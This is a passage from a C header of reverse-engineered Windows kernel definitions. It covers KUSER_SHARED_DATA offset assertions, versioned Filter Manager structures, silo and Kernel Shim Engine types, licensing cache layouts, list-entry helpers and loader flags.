C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MitigationPolicies) == 0x2d5);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveConsoleId) == 0x2d8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, DismountCount) == 0x2dc);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ComPlusPackage) == 0x2e0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LastSystemRITEventTickCount) == 0x2e4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NumberOfPhysicalPages) == 0x2e8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SafeBootMode) == 0x2ec);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, VirtualizationFlags) == 0x2ed);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved12) == 0x2ee);
#if defined(_MSC_EXTENSIONS)
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SharedDataFlags) == 0x2f0);
#endif
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TestRetInstruction) == 0x2f8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcFrequency) == 0x300);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCall) == 0x308);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad0) == 0x30c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad) == 0x310);
#if defined(_MSC_EXTENSIONS)
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCount) == 0x320);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountQuad) == 0x320);
#endif
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Cookie) == 0x330);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ConsoleSessionForegroundProcessId) == 0x338);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeUpdateLock) == 0x340);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineSystemTimeQpc) == 0x348);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineInterruptTimeQpc) == 0x350);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrement) == 0x358);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrement) == 0x360);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrementShift) == 0x368);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrementShift) == 0x369);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UnparkedProcessorCount) == 0x36a);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, EnclaveFeatureMask) == 0x36c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved8) == 0x37c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UserModeGlobalLogger) == 0x380);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageFileExecutionOptions) == 0x3a0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LangGenerationCount) == 0x3a4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved4) == 0x3a8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTimeBias) == 0x3b0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcBias) == 0x3b8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveProcessorCount) == 0x3c0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveGroupCount) == 0x3c4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved9) == 0x3c5);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcData) == 0x3c6);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveStart) == 0x3c8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveEnd) == 0x3d0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, XState) == 0x3d8);
#endif /* __midl | MIDL_PASS */

/*
** KUSER_SHARED_DATA END
*/

/*
** MM UNLOADED DRIVERS START
*/

typedef struct _UNLOADED_DRIVERS {
    UNICODE_STRING Name;
    PVOID StartAddress;
    PVOID EndAddress;
    LARGE_INTEGER CurrentTime;
} UNLOADED_DRIVERS, *PUNLOADED_DRIVERS;

#define MI_UNLOADED_DRIVERS 50

/*
** MM UNLOADED DRIVERS END
*/

/*
** FLT MANAGER START
*/

typedef enum _FLT_FILTER_FLAGS {
    FLTFL_MANDATORY_UNLOAD_IN_PROGRESS = 1,
    FLTFL_FILTERING_INITIATED = 2,
    FLTFL_NAME_PROVIDER = 4,
    FLTFL_SUPPORTS_PIPES_MAILSLOTS = 8,
    FLTFL_BACKED_BY_PAGEFILE = 16,
    FLTFL_SUPPORTS_DAX_VOLUME = 32,
    FLTFL_SUPPORTS_WCOS = 64,
    FLTFL_FILTERS_READ_WRITE = 128,
} FLT_FILTER_FLAGS, *PFLT_FILTER_FLAGS;

typedef enum _FLT_OBJECT_FLAGS {
    FLT_OBFL_DRAINING = 1,
    FLT_OBFL_ZOMBIED = 2,
    FLT_OBFL_TYPE_INSTANCE = 0x1000000,
    FLT_OBFL_TYPE_FILTER = 0x2000000,
    FLT_OBFL_TYPE_VOLUME = 0x4000000,
} FLT_OBJECT_FLAGS, *PFLT_OBJECT_FLAGS;

typedef struct _FLT_OBJECT {
    ULONG Flags;
    ULONG PointerCount;
    EX_RUNDOWN_REF RundownRef;
    LIST_ENTRY PrimaryLink;
} FLT_OBJECT, *PFLT_OBJECT;

// Since w10 th1
typedef struct _FLT_OBJECT_V2 {
    ULONG Flags;
    ULONG PointerCount;
    EX_RUNDOWN_REF RundownRef;
    LIST_ENTRY PrimaryLink;
    GUID UniqueIdentifier;
} FLT_OBJECT_V2, *PFLT_OBJECT_V2; /* size: 0x0030 */

// Since w11 25h2
typedef struct _FLT_OBJECT_V3 {
    ULONG Flags;
    ULONG PointerCount;
    EX_RUNDOWN_REF RundownRef;
    LIST_ENTRY PrimaryLink;
    PVOID RundownLog;
    GUID UniqueIdentifier;
} FLT_OBJECT_V3, *PFLT_OBJECT_V3; /* size: 0x0038 */

typedef struct _FLT_OBJECT_LOG_ENTRY {
    ULONG Action;
    LONG Padding_25;
    EX_RUNDOWN_REF RundownRef;
    PVOID Stack[14];
} FLT_OBJECT_LOG_ENTRY, *PFLT_OBJECT_LOG_ENTRY; /* size: 0x0080 */

typedef struct _FLT_OBJECT_LOG {
    LONG Index;
    ULONG Reserved;
    FLT_OBJECT_LOG_ENTRY Log[1024];
} FLT_OBJECT_LOG, *PFLT_OBJECT_LOG; /* size: 0x20008 */

typedef struct _FLT_SERVER_PORT_OBJECT {
    LIST_ENTRY FilterLink;
    PVOID ConnectNotify;
    PVOID DisconnectNotify;
    PVOID MessageNotify;
    PVOID Filter;
    PVOID Cookie;
    ULONG Flags;
    LONG NumberOfConnections;
    LONG MaxConnections;
    LONG __PADDING__[1];
} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; /* size: 0x0048 */

typedef struct _FLT_RESOURCE_LIST_HEAD {
    ERESOURCE rLock;
    LIST_ENTRY rList;
    ULONG rCount;
    LONG __PADDING__[1];
} FLT_RESOURCE_LIST_HEAD, *PFLT_RESOURCE_LIST_HEAD; /* size: 0x0080 */

typedef struct _FLT_MUTEX_LIST_HEAD {
    FAST_MUTEX mLock;
    LIST_ENTRY mList;
    union {
        ULONG mCount;
        struct {
            UCHAR mInvalid : 1;
            CHAR __PADDING__[7];
        };
    };
} FLT_MUTEX_LIST_HEAD, *PFLT_MUTEX_LIST_HEAD; /* size: 0x0050 */

// Windows 7 version
typedef struct _FLT_FILTER_V1 {
    /* 0x0000 */ FLT_OBJECT Base;
    /* 0x0020 */ struct _FLTP_FRAME* Frame;
    /* 0x0028 */ UNICODE_STRING Name;
    /* 0x0038 */ UNICODE_STRING DefaultAltitude;
    /* 0x0048 */ FLT_FILTER_FLAGS Flags;
    /* 0x004c */ LONG Padding;
    /* 0x0050 */ DRIVER_OBJECT* DriverObject;
    /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;
    /* 0x00d8 */ struct FLT_VERIFIER_EXTENSION* VerifierExtension;
    /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;
    /* 0x00f0 */ PVOID FilterUnload /* function */;
    /* 0x00f8 */ PVOID InstanceSetup /* function */;
    /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;
    /* 0x0108 */ PVOID InstanceTeardownStart /* function */;
    /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;
    /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
    /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[6];
    /* 0x0150 */ PVOID PreVolumeMount /* function */;
    /* 0x0158 */ PVOID PostVolumeMount /* function */;
    /* 0x0160 */ PVOID GenerateFileName /* function */;
    /* 0x0168 */ PVOID NormalizeNameComponent /* function */;
    /* 0x0170 */ PVOID NormalizeNameComponentEx /* function */;
    /* 0x0178 */ PVOID NormalizeContextCleanup /* function */;
    /* 0x0180 */ PVOID KtmNotification /* function */;
    /* 0x0188 */ struct _FLT_OPERATION_REGISTRATION* Operations;
    /* 0x0190 */ PVOID OldDriverUnload /* function */;
    /* 0x0198 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
    /* 0x01e8 */ FLT_MUTEX_LIST_HEAD ConnectionList;
    /* 0x0238 */ FLT_MUTEX_LIST_HEAD PortList;
    /* 0x0288 */ EX_PUSH_LOCK PortLock;
} FLT_FILTER_V1, *PFLT_FILTER_V1; /* size: 0x0290 */

// Windows 8/8.1 version
typedef struct _FLT_FILTER_V2 {
    /* 0x0000 */ FLT_OBJECT Base;
    /* 0x0020 */ struct _FLTP_FRAME* Frame;
    /* 0x0028 */ UNICODE_STRING Name;
    /* 0x0038 */ UNICODE_STRING DefaultAltitude;
    /* 0x0048 */ FLT_FILTER_FLAGS Flags;
    /* 0x004c */ LONG Padding;
    /* 0x0050 */ DRIVER_OBJECT* DriverObject;
    /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;
    /* 0x00d8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
    /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;
    /* 0x00f0 */ PVOID FilterUnload /* function */;
    /* 0x00f8 */ PVOID InstanceSetup /* function */;
    /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;
    /* 0x0108 */ PVOID InstanceTeardownStart /* function */;
    /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;
    /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
    /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
    /* 0x0158 */ PVOID PreVolumeMount /* function */;
    /* 0x0160 */ PVOID PostVolumeMount /* function */;
    /* 0x0168 */ PVOID GenerateFileName /* function */;
    /* 0x0170 */ PVOID NormalizeNameComponent /* function */;
    /* 0x0178 */ PVOID NormalizeNameComponentEx /* function */;
    /* 0x0180 */ PVOID NormalizeContextCleanup /* function */;
    /* 0x0188 */ PVOID KtmNotification /* function */;
    /* 0x0190 */ PVOID SectionNotification /* function */; //SINCE 8.1
    /* 0x0198 */ struct _FLT_OPERATION_REGISTRATION* Operations;
    /* 0x01a0 */ PVOID OldDriverUnload /* function */;
    /* 0x01a8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
    /* 0x01f8 */ FLT_MUTEX_LIST_HEAD ConnectionList;
    /* 0x0248 */ FLT_MUTEX_LIST_HEAD PortList;
    /* 0x0298 */ EX_PUSH_LOCK PortLock;
} FLT_FILTER_V2, *PFLT_FILTER_V2; /* size: 0x02a0 */

// Windows 10 version
typedef struct _FLT_FILTER_V3 {
    /* 0x0000 */ FLT_OBJECT_V2 Base;
    /* 0x0030 */ struct _FLTP_FRAME* Frame;
    /* 0x0038 */ UNICODE_STRING Name;
    /* 0x0048 */ UNICODE_STRING DefaultAltitude;
    /* 0x0058 */ FLT_FILTER_FLAGS Flags;
    /* 0x005c */ LONG Padding;
    /* 0x0060 */ DRIVER_OBJECT* DriverObject;
    /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;
    /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
    /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;
    /* 0x0100 */ PVOID FilterUnload /* function */;
    /* 0x0108 */ PVOID InstanceSetup /* function */;
    /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;
    /* 0x0118 */ PVOID InstanceTeardownStart /* function */;
    /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;
    /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
    /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
    /* 0x0168 */ PVOID PreVolumeMount /* function */;
    /* 0x0170 */ PVOID PostVolumeMount /* function */;
    /* 0x0178 */ PVOID GenerateFileName /* function */;
    /* 0x0180 */ PVOID NormalizeNameComponent /* function */;
    /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;
    /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;
    /* 0x0198 */ PVOID KtmNotification /* function */;
    /* 0x01a0 */ PVOID SectionNotification /* function */;
    /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;
    /* 0x01b0 */ PVOID OldDriverUnload /* function */;
    /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
    /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;
    /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;
    /* 0x02a8 */ EX_PUSH_LOCK PortLock;
} FLT_FILTER_V3, *PFLT_FILTER_V3; /* size: 0x02b0 */

// Windows 10/11+ (22000)
typedef struct _FLT_FILTER_V4 {
    /* 0x0000 */ FLT_OBJECT_V2 Base;
    /* 0x0030 */ struct _FLTP_FRAME* Frame;
    /* 0x0038 */ UNICODE_STRING Name;
    /* 0x0048 */ UNICODE_STRING DefaultAltitude;
    /* 0x0058 */ FLT_FILTER_FLAGS Flags;
    /* 0x005c */ LONG Padding;
    /* 0x0060 */ DRIVER_OBJECT* DriverObject;
    /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;
    /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
    /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;
    /* 0x0100 */ PVOID FilterUnload /* function */;
    /* 0x0108 */ PVOID InstanceSetup /* function */;
    /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;
    /* 0x0118 */ PVOID InstanceTeardownStart /* function */;
    /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;
    /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
    /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
    /* 0x0168 */ PVOID PreVolumeMount /* function */;
    /* 0x0170 */ PVOID PostVolumeMount /* function */;
    /* 0x0178 */ PVOID GenerateFileName /* function */;
    /* 0x0180 */ PVOID NormalizeNameComponent /* function */;
    /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;
    /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;
    /* 0x0198 */ PVOID KtmNotification /* function */;
    /* 0x01a0 */ PVOID SectionNotification /* function */;
    /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;
    /* 0x01b0 */ PVOID OldDriverUnload /* function */;
    /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
    /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;
    /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;
    /* 0x02a8 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;
} FLT_FILTER_V4, *PFLT_FILTER_V4; /* size: 0x02b8 */

// Windows 11+ (27XXX)
typedef struct _FLT_FILTER_V5 {
    /* 0x0000 */ FLT_OBJECT_V3 Base;
    /* 0x0038 */ struct _FLTP_FRAME* Frame;
    /* 0x0040 */ UNICODE_STRING Name;
    /* 0x0050 */ UNICODE_STRING DefaultAltitude;
    /* 0x0060 */ FLT_FILTER_FLAGS Flags;
    /* 0x0064 */ LONG Padding;
    /* 0x0068 */ DRIVER_OBJECT* DriverObject;
    /* 0x0070 */ FLT_RESOURCE_LIST_HEAD InstanceList;
    /* 0x00f0 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
    /* 0x00f8 */ LIST_ENTRY VerifiedFiltersLink;
    /* 0x0108 */ PVOID FilterUnload /* function */;
    /* 0x0110 */ PVOID InstanceSetup /* function */;
    /* 0x0118 */ PVOID InstanceQueryTeardown /* function */;
    /* 0x0120 */ PVOID InstanceTeardownStart /* function */;
    /* 0x0128 */ PVOID InstanceTeardownComplete /* function */;
    /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
    /* 0x0138 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
    /* 0x0170 */ PVOID PreVolumeMount /* function */;
    /* 0x0178 */ PVOID PostVolumeMount /* function */;
    /* 0x0180 */ PVOID GenerateFileName /* function */;
    /* 0x0188 */ PVOID NormalizeNameComponent /* function */;
    /* 0x0190 */ PVOID NormalizeNameComponentEx /* function */;
    /* 0x0198 */ PVOID NormalizeContextCleanup /* function */;
    /* 0x01a0 */ PVOID KtmNotification /* function */;
    /* 0x01a8 */ PVOID SectionNotification /* function */;
    /* 0x01b0 */ struct _FLT_OPERATION_REGISTRATION* Operations;
    /* 0x01b8 */ PVOID OldDriverUnload /* function */;
    /* 0x01c0 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
    /* 0x0210 */ FLT_MUTEX_LIST_HEAD ConnectionList;
    /* 0x0260 */ FLT_MUTEX_LIST_HEAD PortList;
    /* 0x02b0 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;
} FLT_FILTER_V5, *PFLT_FILTER_V5; /* size: 0x02c0 */

typedef FLT_FILTER_V5 FLT_FILTER_COMPATIBLE;
typedef PFLT_FILTER_V5 PFLT_FILTER_COMPATIBLE;

/*
** FLT MANAGER END
*/

/*
** SILO START
*/

typedef struct _SYSTEM_ROOT_SILO_INFORMATION {
    ULONG NumberOfSilos;
    ULONG SiloIdList[1];
} SYSTEM_ROOT_SILO_INFORMATION, *PSYSTEM_ROOT_SILO_INFORMATION;

typedef struct _SILO_USER_SHARED_DATA {
    ULONG ServiceSessionId;
    ULONG ActiveConsoleId;
    LONGLONG ConsoleSessionForegroundProcessId;
    NT_PRODUCT_TYPE NtProductType;
    ULONG SuiteMask;
    ULONG SharedUserSessionId; // since RS2
    BOOLEAN IsMultiSessionSku;
    WCHAR NtSystemRoot[260];
    USHORT UserModeGlobalLogger[16];
    ULONG TimeZoneId; // since 21H2
    LONG TimeZoneBiasStamp;
    KSYSTEM_TIME TimeZoneBias;
    LARGE_INTEGER TimeZoneBiasEffectiveStart;
    LARGE_INTEGER TimeZoneBiasEffectiveEnd;
} SILO_USER_SHARED_DATA, *PSILO_USER_SHARED_DATA;

typedef struct _OBP_SYSTEM_DOS_DEVICE_STATE {
    ULONG GlobalDeviceMap;
    ULONG LocalDeviceCount[26];
} OBP_SYSTEM_DOS_DEVICE_STATE, *POBP_SYSTEM_DOS_DEVICE_STATE;

typedef struct _OBP_SILODRIVERSTATE {
    PDEVICE_MAP SystemDeviceMap;
    OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;
    EX_PUSH_LOCK DeviceMapLock;
    OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
} OBP_SILODRIVERSTATE, *POBP_SILODRIVERSTATE;

typedef struct _OBP_SILODRIVERSTATE_V2 {
    EX_FAST_REF SystemDeviceMap;
    OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;
    EX_PUSH_LOCK DeviceMapLock;
    OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
} OBP_SILODRIVERSTATE_V2, *POBP_SILODRIVERSTATE_V2; /* size: 0x02e0 */

//incomplete, values not important, change between versions.
typedef struct _ESERVERSILO_GLOBALS {
    OBP_SILODRIVERSTATE ObSiloState; //incomplete
} ESERVERSILO_GLOBALS, *PESERVERSILO_GLOBALS;

/*
** SILO END
*/

/*
** KSE START
*/

typedef enum _KSE_DISABLE_FLAGS {
    DisableNone = 0,
    DisableDriverShims = 1,
    DisableDeviceShims = 2,
    MaxDisableFlags
} KSE_DISABLE_FLAGS;

typedef enum _KSE_STATE {
    KseNotReady = 0,
    KseInProgress = 1,
    KseReady = 2
} KSE_STATE;

#define KseFlagsNone 0x0000
#define KseFlagsGroupPolicyOk 0x0002
#define KseFlagsVerifierEnabled 0x0040
#define KseFlagsNoDb 0x0080
#define KseFlagsInitSafeMode 0x0100
#define KseFlagsDrvShimActive 0x0800
#define KseFlagsDevShimsActive 0x1000

#if _MSC_VER >= 1200
#pragma warning(push)
#pragma warning(disable:4324) // structure was padded due to __declspec(align())
#endif
typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _KSE_ENGINE {
    KSE_DISABLE_FLAGS DisableFlags;
    KSE_STATE State;
    ULONG Flags; //KseFlags*
    LIST_ENTRY ProvidersListHead;
    LIST_ENTRY ShimmedDriversListHead;
    PVOID KseGetIoCallbacksRoutine;
    PVOID KseSetCompletionHookRoutine;
    PVOID DeviceInfoCache;
    PVOID HardwareIdCache;
    PVOID ShimmedDriverHint;
} KSE_ENGINE, *PKSE_ENGINE;
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif

typedef struct _KSE_SHIM {
    ULONG Size;
    GUID* Guid;
    PWCHAR Name;
    PVOID KseCallbackRoutines;
    PVOID RemoveNotificationRoutine;
    PVOID ApplyNotificationRoutine;
    PVOID HookCollectionsArray;
} KSE_SHIM, *PKSE_SHIM;

typedef enum _KSE_HOOK_COLLECTION_TYPE {
    HookNtOsImport = 0,
    HookHalImport = 1,
    HookNamedModuleImports = 2,
    HookCallbacks = 3,
    HookLastCollection = 4
} KSE_HOOK_COLLECTION_TYPE;

typedef struct _KSE_HOOK_COLLECTION {
    KSE_HOOK_COLLECTION_TYPE Type;
    PWCHAR TargetDriverName;
    PVOID HookArray;
} KSE_HOOK_COLLECTION, *PKSE_HOOK_COLLECTION;

typedef enum _KSE_HOOK_TYPE {
    HookFunction = 0,
    HookIrpCallback = 1,
    HookLast = 2
} KSE_HOOK_TYPE, *PKSE_HOOK_TYPE;

typedef struct _KSE_HOOK {
    KSE_HOOK_TYPE Type;
    union {
        PCHAR FunctionName;
ULONG CallbackId; } DUMMYUNION; PVOID HookFunction; PVOID OriginalFunction; } KSE_HOOK, * PKSE_HOOK; typedef struct _KSE_PROVIDER { LIST_ENTRY ProviderList; PKSE_SHIM Shim; } KSE_PROVIDER, * PKSE_PROVIDER; typedef struct _KSE_SHIMMED_DRIVER { LIST_ENTRY ListEntry; PVOID DriverBaseAddress; ULONG RefCount; GUID* ShimGuid; //incomplete } KSE_SHIMMED_DRIVER, * PKSE_SHIMMED_DRIVER; /* ** KSE END */ /* ** SOFTWARE LICENSING START */ #pragma pack(push, 1) typedef struct _SL_CACHE_VALUE_DESCRIPTOR { USHORT Size; USHORT NameLength; USHORT Type; USHORT DataLength; ULONG Attributes; ULONG Reserved; WCHAR Name[ANYSIZE_ARRAY]; } SL_CACHE_VALUE_DESCRIPTOR, *PSL_CACHE_VALUE_DESCRIPTOR; typedef SL_CACHE_VALUE_DESCRIPTOR SL_KMEM_CACHE_VALUE_DESCRIPTOR; #pragma pack(pop) typedef struct _SL_CACHE { ULONG TotalSize; ULONG SizeOfData; ULONG SignatureSize; ULONG Flags; ULONG Version; SL_KMEM_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY]; } SL_CACHE, *PSL_CACHE; typedef SL_CACHE SL_KMEM_CACHE; typedef struct _SL_APPX_CACHE_VALUE_DESCRIPTOR { UCHAR HashedName[32]; ULONGLONG Expiration; ULONG DataSize; WCHAR Name[ANYSIZE_ARRAY]; } SL_APPX_CACHE_VALUE_DESCRIPTOR, *PSL_APPX_CACHE_VALUE_DESCRIPTOR; typedef struct _SL_APPX_CACHE { ULONG Version; ULONG Flags; ULONG DataSize; ULONGLONG DataCheckSum; SL_APPX_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY]; } SL_APPX_CACHE, *PSL_APPX_CACHE; /* ** SOFTWARE LICENSING END */ /* ** List Entry macro START (wdm.h) */ #if defined (NTOS_ENABLE_LIST_ENTRY_MACRO) #define InitializeListHead32(ListHead) (\ (ListHead)->Flink = (ListHead)->Blink = PtrToUlong((ListHead))) FORCEINLINE VOID InitializeListHead( _Out_ PLIST_ENTRY ListHead ) { ListHead->Flink = ListHead->Blink = ListHead; return; } _Must_inspect_result_ BOOLEAN CFORCEINLINE IsListEmpty( _In_ const LIST_ENTRY* ListHead ) { return (BOOLEAN)(ListHead->Flink == ListHead); } FORCEINLINE BOOLEAN RemoveEntryList( _In_ PLIST_ENTRY Entry ) { PLIST_ENTRY Blink; PLIST_ENTRY Flink; Flink = Entry->Flink; 
Blink = Entry->Blink; Blink->Flink = Flink; Flink->Blink = Blink; return (BOOLEAN)(Flink == Blink); } FORCEINLINE PLIST_ENTRY RemoveHeadList( _Inout_ PLIST_ENTRY ListHead ) { PLIST_ENTRY Flink; PLIST_ENTRY Entry; Entry = ListHead->Flink; Flink = Entry->Flink; ListHead->Flink = Flink; Flink->Blink = ListHead; return Entry; } FORCEINLINE PLIST_ENTRY RemoveTailList( _Inout_ PLIST_ENTRY ListHead ) { PLIST_ENTRY Blink; PLIST_ENTRY Entry; Entry = ListHead->Blink; Blink = Entry->Blink; ListHead->Blink = Blink; Blink->Flink = ListHead; return Entry; } FORCEINLINE VOID InsertTailList( _Inout_ PLIST_ENTRY ListHead, _Inout_ __drv_aliasesMem PLIST_ENTRY Entry ) { PLIST_ENTRY Blink; Blink = ListHead->Blink; Entry->Flink = ListHead; Entry->Blink = Blink; Blink->Flink = Entry; ListHead->Blink = Entry; return; } FORCEINLINE VOID InsertHeadList( _Inout_ PLIST_ENTRY ListHead, _Inout_ __drv_aliasesMem PLIST_ENTRY Entry ) { PLIST_ENTRY Flink; Flink = ListHead->Flink; Entry->Flink = Flink; Entry->Blink = ListHead; Flink->Blink = Entry; ListHead->Flink = Entry; return; } FORCEINLINE VOID AppendTailList( _Inout_ PLIST_ENTRY ListHead, _Inout_ PLIST_ENTRY ListToAppend ) { PLIST_ENTRY ListEnd = ListHead->Blink; ListHead->Blink->Flink = ListToAppend; ListHead->Blink = ListToAppend->Blink; ListToAppend->Blink->Flink = ListHead; ListToAppend->Blink = ListEnd; return; } FORCEINLINE PSINGLE_LIST_ENTRY PopEntryList( _Inout_ PSINGLE_LIST_ENTRY ListHead ) { PSINGLE_LIST_ENTRY FirstEntry; FirstEntry = ListHead->Next; if (FirstEntry != NULL) { ListHead->Next = FirstEntry->Next; } return FirstEntry; } FORCEINLINE VOID PushEntryList( _Inout_ PSINGLE_LIST_ENTRY ListHead, _Inout_ __drv_aliasesMem PSINGLE_LIST_ENTRY Entry ) { Entry->Next = ListHead->Next; ListHead->Next = Entry; return; } #define ASSERT_LIST_ENTRY_VALID(ListEntry) { \ if (ListEntry == NULL) \ return; \ if (ListEntry->Flink == NULL || ListEntry->Blink == NULL) \ return; \ } #define ASSERT_LIST_ENTRY_VALID_ERROR_X(ListEntry, X) { \ if 
(ListEntry == NULL) \ return X; \ if (ListEntry->Flink == NULL || ListEntry->Blink == NULL) \ return X; \ } #define ASSERT_LIST_ENTRY_VALID_BOOLEAN(ListEntry) ASSERT_LIST_ENTRY_VALID_ERROR_X(ListEntry, FALSE) #endif /* NTOS_ENABLE_LIST_ENTRY_MACRO */ /* ** List Entry macro END */ /* ** LDR START */ #define LDR_DLL_NOTIFICATION_REASON_LOADED 1 #define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2 typedef enum _LDR_DLL_LOAD_REASON { LoadReasonStaticDependency = 0, LoadReasonStaticForwarderDependency, LoadReasonDynamicForwarderDependency, LoadReasonDelayloadDependency, LoadReasonDynamicLoad, LoadReasonAsImageLoad, LoadReasonAsDataLoad, LoadReasonEnclavePrimary, LoadReasonEnclaveDependency, LoadReasonPatchImage, LoadReasonUnknown = -1 } LDR_DLL_LOAD_REASON, * PLDR_DLL_LOAD_REASON; // // Dll Characteristics for LdrLoadDll // #define LDR_IGNORE_CODE_AUTHZ_LEVEL 0x00001000 // // LdrAddRef Flags // #define LDR_ADDREF_DLL_PIN 0x00000001 // // LdrLockLoaderLock Flags // #define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001 #define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002 // // LdrUnlockLoaderLock Flags // #define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001 // // LdrGetDllHandleEx Flags // #define LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT 0x00000001 #define LDR_GET_DLL_HANDLE_EX_PIN 0x00000002 // // 